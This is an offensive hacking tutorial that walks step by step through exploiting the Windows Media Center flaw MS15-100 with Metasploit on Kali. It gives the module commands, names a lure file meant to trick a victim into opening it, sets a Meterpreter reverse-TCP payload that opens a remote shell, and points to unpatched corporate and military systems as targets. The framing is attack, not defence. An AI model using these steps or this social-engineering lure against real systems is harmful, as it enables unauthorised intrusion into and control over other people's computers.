Recently, Microsoft released a new patch
(September 8, 2015) to close another vulnerability
in their Windows Vista, 7, 8, and 8.1 operating systems.
The vulnerability in question (MS15-100) enabled
an attacker to gain remote access to any of these systems
using a well-crafted Media Center link (MCL) file.
As hackers, we need to take a multipronged approach to gaining access to a system. Gone are the days of MS08-067 that would basically allow you to remotely take control of any Windows XP, 2003, or 2008 system. Now we have to be more crafty to find a way to gain access to the system. The Adobe flash exploits have been, and continue to be, excellent gateways into Windows systems—if we can get the user to click on a URL link. Many applications have vulnerabilities, but before attacking those we need to know that they are on the system. That’s why reconnaissance is so critical This hack is targeted to the Media Center on every Windows Vista, 7, 8, and 8.1 system. That makes it ubiquitous, but we still need to send the the victim an .mcl link to gain access to their system. Metasploit recently added an exploit to accomplish this task and that is what we will be using here (another exploit that accomplishes the same thing without the Metasploit framework does exist in the Exploit Database). |
Microsoft Security Bulletin MS15-100 – Important
Here is what Microsoft said about this vulnerability (MS15-100) in their Microsoft Security Bulletin on TechNet:
Although the vulnerability has been patched, many systems don’t have automatic patching for a number of reasons, especially within corporate, large institution, and military installations. Just a warning. This hack is not for the newbie. I requires significant knowledge of both Linux and Metasploit to work.
Step 1: Fire Up Kali
Our first step, of course, is to fire up Kali. This exploit requires that you have Ruby 2.1 on your Kali system, so if you are using Kali 1.1 or earlier, you will need to upgrade your Ruby. Kali 2.0 has the upgraded Ruby, so there’s no need to upgrade.
Step 2: Go to Exploit-DB
Next, let’s go to the Exploit-DB. Under the Remote Code Execution Exploits section, we can find the exploit under its Microsoft designation, MS15-100.
When we select this exploit, it brings up the Metasploit code that we must add to our Metasploit framework. Copy and paste it to a text file in Kali.
Step 3: Add New Module to Metasploit
Earlier this year, I wrote a tutorial on how to install a new module in Metasploit, so please refer to that if you need more help on this subject. You will need to add this module to your Metasploit framework before we can proceed. Name it ms15_100_mcl.rb. It may be that by the time you read this article, Rapid7 will have added this module to the framework and you won’t need to add the module, but time is critical here.
Step 4: Start Metasploit & Search for New Module
Once you have added the module to Metasploit, start (or restart) Metasploit and search for the module to make certain it is available to you.
msf > search ms15_100
If you find it, we are ready to roll!
Step 5: Load New Module
We now need to load the module:
msf > use exploit/windows/fileformat/ms15_100_mcl
This loads this exploit into memory.
Step 6: Info
Now that we have loaded the module, let’s type info to see what requirements this module needs.
msf > info
As you can see, we need to provide this module both the FILENAME and FILE_NAME. One is the .mcl file (FILENAME) and the other is the malicious file (FILE_NAME) we will load on to the victim’s system.
Step 7: Set Options
As you can see in the screenshot above, this module will require that we set the name of the .mcl file (FILENAME) and the name of malicious payload (FILE_NAME). In an attempt to entice the victim to open my .mcl link, I’ll call it best_music_video_ever.mcl.
msf > set FILENAME best_music_video_ever.mcl
msf > set FILE_NAME best_video.exe
We also need to set a payload. In this case, I will use the Windows Meterpreter.
msf > set PAYLOAD windows/meterpreter/reverse_tcp
Finally, we just type exploit.
msf > exploit
That is the file we need to get to the victim!
Step 8: Send the MCL File to the Victim
Metasploit has now created our .mcl file and opened a share on the network. We now need to send this file, one way or another, to the victim and get them to open it.
Note in the screenshot above that the victim’s Windows 7 system has the MCL file, best_music_video_ever.mcl on their desktop.
Step 9: Take Control of the System
When the victim clicks on the .mcl link to watch the “Best Music Video Ever,” it will connect back to our Kali system opening a Meterpreter session. In my case, the session did not automatically open in Metasploit, but when I typed:
msf > sessions -l
I received this response showing me that a session had been opened on the victim machine. Success!
Now that I have a Meterpreter session, I can do just about anything on this system within the privileges I came in on. Since this exploit comes in with the privileges of the user, I will be limited to the privileges of the user who clicked on the .mcl file. Obviously, if we can get an administrator to click on this file, we will come in with their privileges, which would be much more powerful.